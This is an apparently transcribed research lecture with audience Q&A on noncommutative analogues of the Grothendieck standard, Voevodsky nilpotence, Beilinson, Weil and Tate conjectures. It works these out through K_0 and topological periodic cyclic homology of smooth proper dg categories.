This conjecture simply says that algebraic cycles up to homological equivalence and algebraic cycles up to numerical equivalence are the same; there is no difference between these two. That's a conjecture from the 60s which is still wide open. A lot of people have worked on it: for example, it is known when the dimension is less than or equal to two, in characteristic zero even for dimension less than or equal to four, and for abelian varieties in characteristic zero; these are old results of Lieberman, and there are many other cases. Then there is a conjecture of Voevodsky, the Voevodsky nilpotence conjecture, from the 90s. It says that algebraic cycles up to the nilpotence equivalence relation are the same as algebraic cycles up to the numerical equivalence relation. So you are imposing an equality between these two, and in particular the two in between also become equal; in other words, the remark is that this conjecture actually implies the Grothendieck conjecture. It is interesting in the sense that it does not depend on any Weil cohomology theory, and of course it is still wide open. It is known in particular cases, for example when the dimension of X is less than or equal to two, by independent results of Voevodsky and Voisin. Then there is also a conjecture of Beilinson from the 80s which says that, over a finite field, there is no difference between algebraic cycles up to rational equivalence and algebraic cycles up to numerical equivalence. In other words, all the different equivalence relations are the same if you are over a finite field. Again this is wide open; it is known in some cases, for example for curves, thanks to the work of Soulé and Bruno Kahn, etc. And of course the Beilinson conjecture implies the Voevodsky conjecture. So these are three conjectures about these different equivalence relations. Then another conjecture I want to talk about is the famous Weil conjecture, from the 40s, which asserts the following. We are working over a finite field. Choose an integer omega between zero and twice the dimension and look at the crystalline cohomology of your algebraic variety in degree omega. This is a finite dimensional capital K vector space equipped with an action of the Frobenius. The conjecture says that if lambda is an eigenvalue of this operator, of the Frobenius, then it satisfies two conditions: first, it is an algebraic number, and second, its complex absolute value is equal to q to the omega over two, and this for all possible conjugates of lambda. In fact, in the 40s there was of course no crystalline cohomology, so the conjecture was not phrased like this, but this turns out to be an equivalent formulation. And it is now a theorem: it was proven by Deligne that this conjecture holds. Okay.
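In symbols (k = F_q, Fr_q the q-power Frobenius acting on crystalline cohomology, and iota ranging over complex embeddings of the algebraic numbers; this is just a restatement of the conjecture above):
\[
\lambda\ \text{eigenvalue of}\ \mathrm{Fr}_q\ \curvearrowright\ H^{\omega}_{\mathrm{crys}}(X/W(k))_K
\;\Longrightarrow\;
\lambda\in\overline{\mathbf{Q}}\ \ \text{and}\ \ |\iota(\lambda)|=q^{\omega/2}\ \text{for every }\iota .
\]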
And let me mention an interesting fact: suppose we did not yet have Deligne's work, but we knew that the eigenvalue lambda is an algebraic integer. Then it turns out that the l-adic absolute value of lambda is equal to one for all conjugates of lambda, and this for every l different from p, the characteristic of our base field. Of course, Deligne's result implies in particular that these numbers are indeed algebraic integers, so we know this fact. Okay, and this motivates the study of the Hasse-Weil zeta function. Let me recall it: the Hasse-Weil zeta function is defined as the product over all the closed points of your scheme of one over one minus q to the degree of x, raised to the minus s. So it's a complex valued function, and this product converges when the real part of s is greater than d, the dimension. Let me just mention that this number here, q to the degree of x, is the cardinality of the residue field of the point, which is a finite field; so you are counting the number of points of the residue fields of all the closed points of your scheme. Now, if you combine the result of Deligne with some work of Berthelot on crystalline cohomology, you can rewrite this function; you have a cohomological interpretation of it. You can write it as the product, over omega between zero and twice the dimension, of the determinant of identity minus q to the minus s times the Frobenius acting on the crystalline cohomology of X in degree omega, raised to the power minus one to the omega plus one. This tells you in particular that this function, which we know is well defined on this half-plane, actually extends to a unique meromorphic continuation on the entire complex plane. Moreover, Deligne's result tells you where the zeros and the poles of this function live: in these regions in red, these vertical lines, is where the poles live, and in these regions in blue is where the zeros occur; you don't know exactly where they are, but they lie on these vertical lines. You also observe that, since this function is defined using complex exponentiation, it is periodic of period 2 pi i over the log of q; so you have a periodicity like this, which simply comes from the short exact sequence involving (2 pi i over log q) times Z that you have when you use the complex exponential. And then, finally, I would like to mention one final conjecture, which is the famous conjecture of Tate, from the 60s. It says the following. Here I will be over a finite field again, and there are in fact three versions of the conjecture. You have one version for a prime l different from p: here you have the cycle class map going to the étale, the l-adic cohomology.
And these cycle classes in fact land in the elements that are fixed under the action of the absolute Galois group. The conjecture says that if you change from Q coefficients to Q_l coefficients, then this cycle class map becomes surjective: any class invariant under the absolute Galois group comes from an algebraic cycle. Then there is also a p-version of this: you do the same, but now you use crystalline cohomology and you look at the crystalline Frobenius, so these elements land in those that are fixed under the crystalline Frobenius, and when you change from Q to Q_p coefficients this map becomes surjective. That's the conjecture. There is also a strong form of the conjecture, which says the following. As I was mentioning, we know that the poles live on these red vertical lines, but we don't know where they are exactly. This conjecture tells you that the function has poles precisely at the points s = i: so here there is a pole, here there is a pole, here there is a pole, and so on, and of course, because of the periodicity, you have infinitely many poles on each line. Moreover, it tells you not only that there are poles there, but that the order of the pole is given by a precise number: it is equal to the dimension of the Q vector space of algebraic cycles of codimension i with Q coefficients up to numerical equivalence. And we impose this for every i between zero and the dimension, for all these i's. As you see, it's called the strong Tate conjecture because it is actually stronger than the classical Tate conjecture: it's a theorem of Tate that the strong Tate conjecture implies the classical Tate conjecture, for every l different from p. Moreover, if you assume the conjecture D(X), this Grothendieck standard conjecture, then the converse also holds, so it becomes an equivalence, and this is also true for the p-version of the conjecture. Okay, so these are the conjectures that I would like to establish non-commutative counterparts of. And let me say that these conjectures are wide open in general; they are known in very particular cases. Tate proved it in the case of curves, and nowadays people have been able to prove it in the case of K3 surfaces. Okay, so just before finishing this commutative part, let me mention something really quick: this very interesting function also admits a functional equation. This is a theorem of Artin and Grothendieck: you have a relation between the function at s and the function at d minus s, and the relation between the two is given by this factor, where you have the Euler characteristic of your scheme X and a constant, which is minus the Euler characteristic times the dimension divided by two. Okay, so that was about that function over there. So this is what I wanted to say about the commutative world. Now let's move on: what do I mean by non-commutative geometry? Different people look at non-commutative geometry in different ways, and for me non-commutative geometry will actually be non-commutative algebraic geometry.
So this is a subject that goes back to the Moscow school, let's say, to Manin and his students, etc. There is this standard definition of Bondal and Kapranov of what a differential graded category, a DG category, is: it is simply a category A which is enriched over complexes of k vector spaces. So the Hom spaces are complexes, not ordinary sets. You have a lot of examples: whenever you have a differential graded algebra, you get a DG category with a single object; and whenever you have a scheme, you can look at the category of perfect complexes on your scheme, the complexes of O_X-modules that are locally quasi-isomorphic to bounded complexes of vector bundles, and this carries a canonical DG enhancement. So these are two examples: algebra and geometry both give rise to DG categories. And there is this very famous example of Beilinson, which says the following: if you look at the projective line and at modules over the projective line, that category is very far from modules over an algebra; but if you pass to the derived setting, then this category is actually derived Morita equivalent to an algebra, this algebra of matrices. In other words, this is telling you that the projective line, in the derived setting, is actually affine: it is given by an algebra, but by a non-commutative algebra. And in this world there is a notion of smoothness and properness; this is due to Kontsevich. If you have a DG category, you call it smooth if, by definition, when you regard it as a bimodule over itself, it is compact in the derived category of bimodules. And proper simply means that if you fix any two objects of your category, you get a complex, you look at its cohomology, and you ask the cohomology in each degree to be finite dimensional and, moreover, the total cohomology to be finite dimensional, and this for any two objects x and y. The key remark is that if you have a scheme which is smooth and proper, then this category of perfect complexes is actually smooth and proper in this sense, and the converse also holds: perfect complexes on a scheme reflect these properties of smoothness and properness. So the idea now is that we would like to do geometry not with a scheme but with an arbitrary DG category, a smooth and proper one, which mimics smooth and proper schemes. What can be done in that case? In particular, for this course, I would like to formulate the non-commutative counterparts of all these conjectures, and if I want to do that I need some kind of non-commutative Weil cohomology theory, something that works not just for schemes but in full generality. For this, let me talk about topological periodic cyclic homology. Let me put some names on the board: periodic cyclic homology goes back to Connes and many others, and these topological versions go back to Hesselholt and to Nikolaus and Scholze, among many others. Let me give you an idea of this; I suggest looking at last week's course and also Kaledin's, if you want to learn more about these things.
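In formulas (A(x,y) denotes the Hom complex between two objects and A^op the opposite DG category; this just rewrites the two definitions above):
\[
A\ \text{smooth}\ \iff\ A\in\mathrm{Perf}\big(A\otimes_k A^{\mathrm{op}}\big),
\qquad
A\ \text{proper}\ \iff\ \sum_{n}\dim_k H^n\big(A(x,y)\big)<\infty\ \ \text{for all objects }x,y.
\]
For X smooth and proper over k, the DG category of perfect complexes on X is smooth and proper in this sense, and conversely.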
So let's suppose, to simplify, that I just have an ordinary algebra A. What can I do? I can do the following construction. I can look at A, A tensor A over the base field, A tensor A tensor A over the base field, and so on, and I can use the multiplication to define maps: I can multiply these two factors, which gives me one map, or multiply them in the other order, which gives a different map, since the algebra is not necessarily commutative; and here I can multiply these two, or these two, or even these two. So I get this simplicial gadget and I can totalize it, and if you totalize it you get something called the Hochschild homology of A. This is something that is k-linear; for example, the Hochschild homology of the base field is the base field itself. Now, at every level you can permute the factors in the cyclic order, and if you put all that information together, it gives you an action of the circle. So you have an action of the circle on this object, and you can perform the Tate construction; if you do this Tate construction, what you end up with is the periodic cyclic homology of A. This again is something k-linear, but it's more than that, it's actually periodic: for example, if you compute it over the base field, you get a ring of Laurent polynomials in one variable of degree minus two. So you get something 2-periodic. So Gonçalo, there's a question, maybe I've missed it: is there a way to define smooth and proper relatively? If I have a map of DG categories, can I define a smooth proper morphism? Yes, there is; I don't remember it off the top of my head, but it's in the literature, and I can dig it up and forward the definition. Yes, there is a relative setting here. And now, this was in arbitrary characteristic; what I want to consider is characteristic p, positive characteristic. In positive characteristic I can do a topological version of periodic cyclic homology. Roughly speaking, what I do is change the base: I now take tensor products over the sphere spectrum, so I get a base which is even more initial than the original one. I can totalize this construction and get a topological version of Hochschild homology, which is still something k-linear. If you compute the THH of little k, that's a result of Bökstedt, you get a ring of polynomials in one variable of degree two. But then it turns out that there is a relation between the two: Hochschild homology is a module over THH, and one thing you can do is take the tensor product with k over THH of k. In other words, you can think of THH as a one-parameter deformation of Hochschild homology, with this parameter here, and when you take the fiber at zero you get the original Hochschild homology. That's one way to think about it. And then here you can mimic the previous construction: again you have actions of the cyclic groups, these permutations, and if you put them all together they give you an action of the circle; you can do a Tate construction in this topological sense, the Greenlees construction, and you get this topological version, which is now no longer k-linear.
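Schematically (standard notation, not all of it written on the board: |-| denotes the realization of the cyclic bar construction, S the sphere spectrum, and (-)^{tS^1} the Tate construction):
\[
\mathrm{HH}(A/k)=\big|\,[n]\mapsto A^{\otimes_k(n+1)}\big|,\qquad \mathrm{HP}(A)=\mathrm{HH}(A/k)^{tS^1},\qquad \mathrm{HP}_*(k)\cong k[u^{\pm1}],\ |u|=-2,
\]
\[
\mathrm{THH}(A)=\big|\,[n]\mapsto A^{\otimes_{\mathbf{S}}(n+1)}\big|,\qquad \mathrm{TP}(A)=\mathrm{THH}(A)^{tS^1},\qquad \mathrm{THH}_*(k)\cong k[\sigma],\ |\sigma|=2.
\]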
So for example, when you compute it over the base field, what you get is the ring of Witt vectors with one invertible variable of degree minus two adjoined. From this computation and the previous one you see that TP is a characteristic zero lifting of HP: if you reduce the Witt vectors mod p, you get back the base field. And this is true in general: TP is a characteristic zero lifting of periodic cyclic homology. And now here you can do something that you cannot do in algebra: I can invert p, and that will be important for us, because if I invert p, a new feature appears in the topological world that does not exist in the algebraic world. This new feature is the cyclotomic Frobenius. Again, I am in positive characteristic. What I'm going to say is in this topological language, but this was originally defined by Kaledin; Kaledin was the first person to make this rigorous. Let me make a remark: suppose you have a commutative k-algebra over a field of characteristic p. Then you know that these two relations hold: a plus b to the p is a to the p plus b to the p for any two elements, and the product to the p is a to the p times b to the p. But if you are no longer working with commutative objects, these things don't hold, so you don't actually have a Frobenius on the algebra. The Frobenius will appear not on the algebra itself but on this realization, on this invariant. If you have a smooth proper DG category A, you can look at its THH, and this THH of A is actually a cyclotomic spectrum, in the sense that not only does it have the circle action that I used to define TP, but moreover it has a map from THH of A to THH of A with the Tate construction with respect to the cyclic group of order p applied. There's a question, Gonçalo: what about the definition of TP of k in characteristic zero? Yeah, we can do that similarly, but I'm just focusing on positive characteristic here. Are we defining the p-typical Witt vectors just to be k itself, or? No, no, I just want to work in the case where I'm doing the topological theory in positive characteristic. Okay. So here I have this map, which is S^1-equivariant: here we have an action of S^1, and here you have a residual action of S^1, or if you want, of S^1 modulo C_p, which identifies with S^1. This data is what is called a cyclotomic spectrum; the notion is more general, but I'm working at the prime p. And then, out of this data, what you can do is the following: you look at THH of A, and you have a canonical map from the homotopy fixed points of the circle action to the Tate construction, and this Tate construction is what we call TP of A. Moreover, it turns out that in this setting, if you are working with a smooth proper DG category, TP is equivalent to THH of A with the Tate construction for C_p applied and then the homotopy fixed points with respect to S^1. It's a technical result; you have this equivalence, and it implies that you have another map here.
So you take this original map and you take the homotopy fixed points with respect to S^1. Now you have these two maps, and it turns out that the fiber of the canonical map is killed after inverting p: if I invert p, that fiber disappears, in other words this map becomes an equivalence. And if it becomes an equivalence, I can define a cyclotomic Frobenius here, which is simply this map composed with the inverse of the canonical map. That gives you a Frobenius from TP of A with p inverted to TP of A with p inverted, and moreover this map is an equivalence. So the Frobenius exists here after inverting p, but it does not exist on the algebra itself, in contrast with the commutative world; it only exists on the invariant. Let me make some remarks about this cyclotomic Frobenius. First of all, it is not a Z/2-graded map: you only have the relation that when you pass from degree n to degree n minus two, the two Frobenii agree up to multiplication by one over p. Moreover, these maps are not capital K linear, as in commutative geometry; they are only sigma-semilinear. In particular, if you are working over a finite field, one thing you can do is compose: you compose phi_n with itself r times, and that gives you something which is actually K-linear. The relation between these composed Frobenii, when you pass from degree n to degree n minus two, is then multiplication by one over q. Gonçalo, there is a question: don't we need something like k being perfect for the Frobenius to be an equivalence? It comes from my assumptions: everything comes from A being smooth and proper, and this implies that the Frobenius is an equivalence. Okay, so this suggests that you should think about periodic cyclic homology and topological periodic cyclic homology as non-commutative Weil cohomology theories: that's what is going to replace de Rham cohomology and crystalline cohomology. But there is something else we can do first. Let me write an aside here about non-commutative motivic realizations. One can wonder whether all the commutative realizations can be extended to the non-commutative world, and there is a result saying the following. You can look at smooth schemes and go to the Morel-Voevodsky stable homotopy category, the stable A^1-homotopy category of schemes; and on the non-commutative side you have DG categories, and we can construct a non-commutative version of this Morel-Voevodsky category. I'm not going to define it in this course; it's just an aside. These things are related, because if you have a scheme you can pass to its perfect complexes, and then we would like to relate the two sides. The relation is as follows: here we have the motivic spectrum KGL that represents homotopy K-theory, and we can look at modules over KGL with Q coefficients. You see that this side is a covariant procedure and this side is a contravariant procedure, so we need a duality; we can dualize here, and then it turns out that there exists a functor here which has a lot of good properties: it is fully faithful, it is a tensor functor,
and it even admits a right adjoint. As a consequence of this bridge between the commutative and the non-commutative world, we have the following corollary. Suppose you have a realization you are interested in: you have Voevodsky's category of geometric motives and a realization out of it, say with Q coefficients. What you can do is pre-compose with duality and then go to schemes, so we have this contravariant functor on schemes. Then I can modify the realization: here I have a Tate object, which is nothing but the realization of the Tate motive, and I can trivialize it by considering modules over the sum of all possible powers of it. So I get a modified realization, and it turns out that when you pass from schemes to DG categories in this sense, all these modified realizations can be extended to the non-commutative world: there exists a non-commutative version of the realization. In particular, this result gives rise to a lot of non-commutative motivic realizations: for example an l-adic version, a Hodge version, a de Rham-Betti version that, for example, leads you to define what non-commutative periods are, etc. And how is this corollary obtained? Let me explain. You can do exactly the same thing here, but instead of KGL you use the spectrum that represents motivic cohomology. Sorry, I need some space, I'm going to erase the corollary. So I just want to have this realization and extend it to the non-commutative world, and let me do it here. The first point is that modules over the motivic cohomology spectrum give the big DM; this is a result of Röndigs and Østvær. So this composition here is your motivic realization on Voevodsky's category: you have your realization going towards your target. The second observation is that KGL with Q coefficients is actually this trivialization, the sum over all n; you have this fact, which tells you that you can base change here from modules over motivic cohomology to modules over KGL. Then you do the same thing on the target: you look at modules over the sum of the powers of the realization of the Tate motive, and you get this induced map here. So your non-commutative extension is obtained by using this fully faithful functor, then its adjoint, and then this induced map. That is the way to extend any kind of realization, as long as you modify it, to this setting. Of course, this is a bit of cheating, right? Because you are defining it using schemes: you are building this functor using schemes, you look at the closest scheme associated to your non-commutative motive via the adjoint and apply the classical invariant. So it has a lot of problems: for example, these extensions are not monoidal, and you don't have finiteness, so it shouldn't really be called a realization. But it is something that can be done: you can always extend anything from the commutative world to the non-commutative world via this adjoint. It's a bit of cheating.
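Two of the inputs just mentioned, written out (the precise hypotheses, for instance on the base field, are glossed over in this sketch, and R denotes the given realization):
\[
\mathrm{Mod}_{\mathrm{H}\mathbf{Q}}\big(\mathrm{SH}(k)\big)\;\simeq\;\mathrm{DM}(k)_{\mathbf{Q}}\ \ (\text{Röndigs-Østvær}),
\qquad
\mathrm{KGL}_{\mathbf{Q}}\;\simeq\;\bigoplus_{n\in\mathbf{Z}}\mathrm{H}\mathbf{Q}(n)[2n],
\]
so a realization R out of DM, once Tate-trivialized by passing to modules over the sum of the R(Q(n)[2n]), can be pushed through the fully faithful functor into KGL_Q-modules and its right adjoint; that is the extension to DG categories described above.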
Okay, so now we are ready to come back to our original goal, and we can actually formulate all the conjectures. Yes. No, I'm just saying: suppose you have a realization, this map, this realization; as soon as you modify it, in the sense that you trivialize the Tate motive, you can extend it to any DG category via this procedure. But of course this uses an adjoint, so it's not the correct way to do it; what you would want is an intrinsic definition that does not use actual schemes. Gonçalo, what was the question? We did not hear it. It was just to explain the board a little bit better. Okay. So now, what is the replacement of algebraic cycles? It's the Grothendieck group. I have a smooth and proper k-linear DG category A and I look at its K_0; well, its K_0 is just the K_0 of its derived category, which is a triangulated category. Okay. Now we choose an element of this K_0, and we can phrase all the analogous equivalence relations. We can talk about nilpotence equivalence: you say that a class alpha is nilpotently trivial if, by definition, there exists an integer n such that when you tensor the class with itself n times, which gives something living in the K_0 of A tensored with itself n times, this becomes zero. So you can make this definition. How about homological equivalence? We now have the non-commutative cohomology theories that I explained, so you define homological equivalence as follows: these theories come equipped with Chern characters, something I will explain better on Wednesday, defined on K_0 with values in the degree zero part of periodic cyclic homology and the degree zero part of topological periodic cyclic homology, and you simply say that a class is homologically trivial if its Chern character is zero. And you also have numerical equivalence. Here, how do you define the intersection of cycles? You define a pairing on K_0 as follows: if you have a module M and another one N, and you look at the corresponding classes, you look at the Homs in the derived category of A from M to the shifts of N, take the dimensions of these Hom spaces, and form the alternating sum, the sum over n of (-1)^n times the dimension of Hom(M, N[n]), with n varying over the integers. In this way we extract a number, and this gives a pairing on K_0 which is neither symmetric nor skew-symmetric. But since A is smooth and proper, you have a Serre functor, and using this Serre functor you can prove that the left and right kernels, which a priori are different, are in fact the same. So you can define a class to be numerically trivial if this pairing, let's call it chi of alpha and beta, is equal to zero for every beta. Okay, and then we have the analogous remarks: if a class is nilpotently trivial, it is homologically trivial, and then numerically trivial, which implies that on K_0 you have all these quotients, modulo nilpotence, modulo homological, modulo numerical equivalence, and again the last one is always finite dimensional. Does it mean the nilpotency goes to zero, that the Euler characteristic is zero?
No, being zero here means that this pairing vanishes for every beta: alpha is such that the pairing vanishes for every beta. And nilpotence implies the homological equivalence you mentioned? Yes, nilpotently trivial implies homologically trivial; it's an exercise. Okay, and now, using this, we can formulate, as you would expect, the non-commutative counterparts. We have the non-commutative Grothendieck standard conjecture of type D, which I denote D_nc(A): it simply says that K_0 modulo homological equivalence and K_0 modulo numerical equivalence are the same. You can also define the non-commutative version of the Voevodsky nilpotence conjecture, the conjecture V_nc(A): again, it says that K_0 up to nilpotence equivalence is the same as K_0 up to numerical equivalence. Once again, if these two are the same, then the two in between are the same; in other words, this conjecture implies the preceding one. And of course we can also define the non-commutative version of the Beilinson conjecture: over a finite field, K_0 is insensitive to all these equivalence relations. Okay, so these are the analogues. Then we can go further and define the non-commutative version of the Weil conjecture. What do we do here? Again we are over a finite field. If we have a smooth and proper DG category A (sorry, DG category, not DG algebra), you look at this finite dimensional capital K vector space, TP_0 of A with p inverted, equipped with the automorphism F_0, which is just the cyclotomic Frobenius composed with itself r times; and similarly TP_1 with p inverted comes with the Frobenius F_1, again composed r times. The conjecture is that if lambda is an eigenvalue of F_0, respectively of F_1, then these numbers are algebraic numbers, and their complex absolute value is equal to one, respectively to the square root of q, and this for all conjugates of lambda. Also in this non-commutative world you have an analogue of the earlier proposition, which says that if there exists an integer n such that q to the n times lambda is an algebraic integer, then the l-adic absolute value of lambda is equal to one for all conjugates of lambda, and this for every prime l different from p. So you also have this result; of course it is conditional in this case, in contrast with the commutative world. Gonçalo, how much time do you still need? I just have one and a half slides; it's pretty quick. Thank you. So let me just say... Maybe there's a question first: are these conjectures Morita invariant? Yes, of course, because anything that is Morita equivalent will actually have the same motive. Let me give you a very technological answer: Morita equivalent DG categories have the same non-commutative motive, and all these conjectures descend to non-commutative motives; that's the approach I will explain on Wednesday. And we can also talk about the non-commutative Hasse-Weil zeta functions. Here, of course, we cannot count points; the only thing we have is the cohomology, and we need to choose an embedding of capital K into C. Once we choose this embedding, we can define these functions.
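In symbols (q = p^r, phi_n the cyclotomic Frobenius in degree n, and iota ranging over complex embeddings; this paraphrases the statement on the board):
\[
F_0:=\varphi_0^{\circ r}\ \curvearrowright\ \mathrm{TP}_0(A)_{1/p},\qquad F_1:=\varphi_1^{\circ r}\ \curvearrowright\ \mathrm{TP}_1(A)_{1/p},
\]
\[
\lambda\ \text{eigenvalue of}\ F_0\ \Longrightarrow\ \lambda\in\overline{\mathbf{Q}},\ |\iota(\lambda)|=1;
\qquad
\lambda\ \text{eigenvalue of}\ F_1\ \Longrightarrow\ \lambda\in\overline{\mathbf{Q}},\ |\iota(\lambda)|=\sqrt{q}.
\]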
So what we can do is consider these functions: the determinant of one minus q^{-s} times the Frobenius F_0. But then we need to use this embedding to go towards C, because only after embedding K into C does this make sense as a complex function: you take TP_0 and you need to go to C. And then you can do the same story here: the determinant of one minus q^{-s} times the Frobenius F_1, on TP_1, transported to C. Okay. So we have these functions; over C they are, of course, meromorphic, and what this is telling you is that, by their very definition, they are periodic with this period. And what our noncommutative version of the Weil conjecture is telling you is that the poles are actually on this line in the first case and actually at one half in the second case. When we change the embedding these functions change, but the place where the poles are does not change. And finally, let me just say that we also have the noncommutative version of the Tate conjecture. I recall that we are over a finite field. The conjecture is as follows. We have the noncommutative version for l different from p: here what you do is you look at the K-theory of A, base-changed to the finite field extensions, and then you take the Bousfield localization with respect to topological K-theory. Now you look at pi_{-1} of this, which is an abelian group, and then you take its l-adic Tate module, and you ask it to be zero for every n greater than or equal to one. So it is a vanishing conjecture, saying that all these l-adic Tate modules of these abelian groups vanish, for every possible n, for every possible extension. That's one way to phrase it. Then we have the p-version of this: here you have the Chern character going towards TP_0 of A with p inverted, and it lands in the invariants under the cyclotomic Frobenius; the conjecture is that this map onto the invariants is surjective. And you also have a strong form of the Tate conjecture: you look at the order at s = 0 of this function — its zeros are elsewhere, but there is actually a pole at s = 0, and the order of this pole is given by the dimension of the K_0 of A modulo numerical equivalence. And I should like to emphasize that this order actually does not depend on the embedding: if you think about the definition, it is just the algebraic multiplicity of one as an eigenvalue of these operators, and that does not depend on the embedding. That is the order of the pole there. And then we also have the result saying that this strong form of the Tate conjecture implies the Tate conjecture itself; moreover, if you add the noncommutative version of the Grothendieck conjecture, they become equivalent. So what is the upshot of all this? The upshot is the following theorem, which is the very last one, and I will end there. It is saying that all these definitions are the correct ones, in the following sense. If you take a smooth proper scheme X, then you can do two things. You can look at the conjecture C(X), where C is any one of these conjectures — D (Grothendieck), V (Voevodsky), B (Beilinson), the Weil conjecture, the Tate conjecture, the strong Tate conjecture, and many others, in fact. You can do this. Another thing that you can do is look at the noncommutative version of the conjecture for the associated dg category perf(X).
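A possible way to write the zeta-type functions and the pole statement described above is the following; the notation Z_0, Z_1 is not from the talk, the inverse-determinant convention is an editorial choice made so that the functions have poles (rather than zeros) where the talk places them, and the precise normalizations should be checked against the speaker's survey.
\[
Z_0(\mathcal A;s)\;=\;\det\big(\mathrm{id}-q^{-s}F_0 \mid TP_0(\mathcal A)_{1/p}\otimes_K\mathbb C\big)^{-1},\qquad
Z_1(\mathcal A;s)\;=\;\det\big(\mathrm{id}-q^{-s}F_1 \mid TP_1(\mathcal A)_{1/p}\otimes_K\mathbb C\big)^{-1},
\]
\[
\text{strong Tate:}\qquad -\operatorname{ord}_{s=0} Z_0(\mathcal A;s)\;=\;\operatorname{rk}\big(K_0(\mathcal A)/\!\sim_{\mathrm{num}}\big),
\]
that is, the order of the pole of Z_0 at s = 0 equals the rank of K_0 modulo numerical equivalence, which, as noted above, is the algebraic multiplicity of the eigenvalue 1 and hence independent of the chosen embedding.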
And if this conjecture holds, it turns out that this implies that the noncommutative version also holds. But what is interesting in the theorem is that this is actually an equivalence. So this is saying that these classical conjectures — all of them — which are formulated in the setting of algebraic geometry, in fact make sense in the much larger setting of smooth proper dg categories. And if you apply this to this particular kind of dg category, you recover the original conjecture. This is true for the conjectures that I explained today, but there are many other conjectures for which this holds; I don't have time to explain them. And now the idea is to exploit the fact that I now have noncommutative techniques to attack the right-hand side and, as a consequence, attack the left-hand side. This is the goal of the following lectures. Okay, thank you, and sorry for going over time. — Okay, so thanks for the talk. We are aware that there were serious problems with the connection for some of the attendees; we are sorry, we will try to make it better, but unfortunately it seems to be an internet problem. In any case, there will be a YouTube video if you could not follow the talk. So now we have questions; I saved a few questions — three questions, actually — for the end of the talk. The first one: someone is asking whether you could repeat how TP is related to the motivic stuff here. — You mean the commutative world, I imagine; that's the question, right? — Yes. — So the relation is as follows. TP is 2-periodic, and if you take the TP of this dg category — you take your scheme and take perf of it — it turns out that the even part gives you the sum of the even groups of the crystalline cohomology of your scheme and the odd part gives you the sum of the odd cohomology groups of crystalline cohomology. So this is telling you that this invariant, of course after inverting p, computed on this dg category, gives you crystalline cohomology — not the individual pieces, but up to parity. Moreover, this TP comes equipped with the cyclotomic Frobenius, but this cyclotomic Frobenius, as I remarked, is not Z/2-graded, okay? When you change from n to n minus 2, there is a scalar that appears. So let me write TP_0 and TP_1, with the cyclotomic Frobenius F_0 and F_1 acting on them; they correspond to something on the other side: F_0 corresponds to the sum of the even crystalline Frobenius operators on X, but with a certain scalar multiplying each of them, and F_1 corresponds to the sum of the odd crystalline Frobenius operators, again multiplied by suitable powers of p. So, intuitively speaking, this is telling you that you lose the weights: when you pass from X to this dg category, you can recover everything up to the weights — you lose the weights. But for the conjectures that is enough; you don't lose anything in terms of the conjectures. — I should mention that some of the colors are completely unreadable, so don't use those colors. Do you use colors? — Yeah. — Maybe the green. — Is this better? — Slightly. — Okay, just a remark: there was another question about the relation between the NC conjecture and the usual one. — So I just say it again: that's on the blackboard.
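The comparison with the commutative world sketched in this answer can be summarized as follows; this is an editorial rendering, and the exact rescaling factors for the Frobenius operators are only indicated, not pinned down, since they were not fully audible in the recording.
\[
TP_0(\mathrm{perf}(X))_{1/p}\;\cong\;\bigoplus_{i\ \mathrm{even}} H^{i}_{\mathrm{crys}}(X)_{1/p},\qquad
TP_1(\mathrm{perf}(X))_{1/p}\;\cong\;\bigoplus_{i\ \mathrm{odd}} H^{i}_{\mathrm{crys}}(X)_{1/p},
\]
and under these identifications the cyclotomic Frobenius F_0 (resp. F_1) corresponds to the direct sum of the even (resp. odd) crystalline Frobenius operators, each rescaled by a suitable power of p; only the weight information is lost, which is harmless for the conjectures in question.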
They are equivalent in the smooth proper case. — Which one? — The noncommutative one and the usual one. — So that's what you stated. — And there is also a question: do any of these conjectures have a mixed-characteristic analogue, or formulation? — I don't know. You want to be working over a DVR or something like that? — I guess so, yeah. — Yeah, I mean, I haven't thought about that seriously. But I would say that it's likely that you could expect something like that. Yes. — Okay. So this is related, in fact: there's another question about relative versions of these conjectures. Are there relative versions of these conjectures? — I don't know. I mean, in the classical world, yes, I think some of them admit relative versions. I haven't explored that. Yes, that's a good question; that's a good thing for the future — how do things work in families, and things like that. — Okay, I'm not sure I understand the question correctly, but I'll just read it: what is A tensor n, and does it agree with perf(X) tensor n in the geometric case? — Yes, yes, yes: when you do this, this is that, and my schemes are nice enough for this kind of phenomenon to hold. Yes. I imagine that this question is about the nilpotence equivalence relation, because on one side it was about cycles on X^n and on the other side it was about the K_0 of A tensor n; and when A is of the form perf(X), there is this agreement. — Thanks. That was a question of Remy van Dobben de Bruyn. There's also a question by Ola Sende: is the Voevodsky nilpotence conjecture equivalent to the Beilinson–Soulé conjecture? — The Beilinson conjecture is only over a finite field. Beilinson–Soulé... maybe you can remind me what it is? — It's the vanishing of motivic cohomology in negative degrees. — Yeah, I don't remember; I would have to dig in. I think I remember that there are close connections between the two; I don't know if it's exactly the same, but yeah, I don't remember off the top of my head. — So I think there's no direct relation. — Okay, if you put all the conjectures together... Oh, I think the Beilinson conjecture I stated is actually the strong — it's actually the Tate conjecture, and then you mod out by numerical equivalence. — Beilinson–Soulé? — No, that one is just the vanishing of motivic cohomology in negative degrees. — Okay, so I would have to check. — Could you please state precisely how the l-adic Tate conjectures are formulated via TP? — No, not via TP: I am formulating the p-version via TP, right? I use TP to formulate the p-version of the Tate conjecture, and I formulated the l-version of the Tate conjecture using K-theory, right? And the question is whether one can do that. Yes, I mean, that can be done, but it uses results of Thomason that give you the relation. The relation is that you have an Atiyah–Hirzebruch spectral sequence that goes from l-adic cohomology to étale K-theory. So you have something like this; rationally, they prove that it degenerates, so you have something like: the étale K-theory of X, completed at l and then rationalized, is in fact the sum of these l-adic cohomology groups. So here you already have a link between étale K-theory and l-adic cohomology — but it is étale K-theory. But then you have this beautiful result of Thomason that tells you that you can describe this algebraically, because you have completed at l.
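For orientation, the Thomason-type statements invoked in this answer can be sketched as follows; this is an editorial summary, with the hypotheses on X and on the prime l suppressed (see Thomason's étale descent theorem for the precise conditions), and the indexing given only up to the standard conventions.
\[
\pi_{n}\big(K^{\mathrm{\acute et}}(X)^{\wedge}_{\ell}\big)\otimes\mathbb Q \;\cong\; \bigoplus_{j} H^{2j-n}_{\mathrm{\acute et}}\big(X,\mathbb Q_{\ell}(j)\big),
\qquad
K^{\mathrm{\acute et}}(X)^{\wedge}_{\ell} \;\simeq\; \big(L_{KU}K(X)\big)^{\wedge}_{\ell},
\]
where the first isomorphism is the rational degeneration of the Atiyah–Hirzebruch spectral sequence and the second equivalence identifies l-completed étale K-theory with the l-completion of algebraic K-theory localized at topological K-theory KU, which is the algebraic description recalled in the reply that follows.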
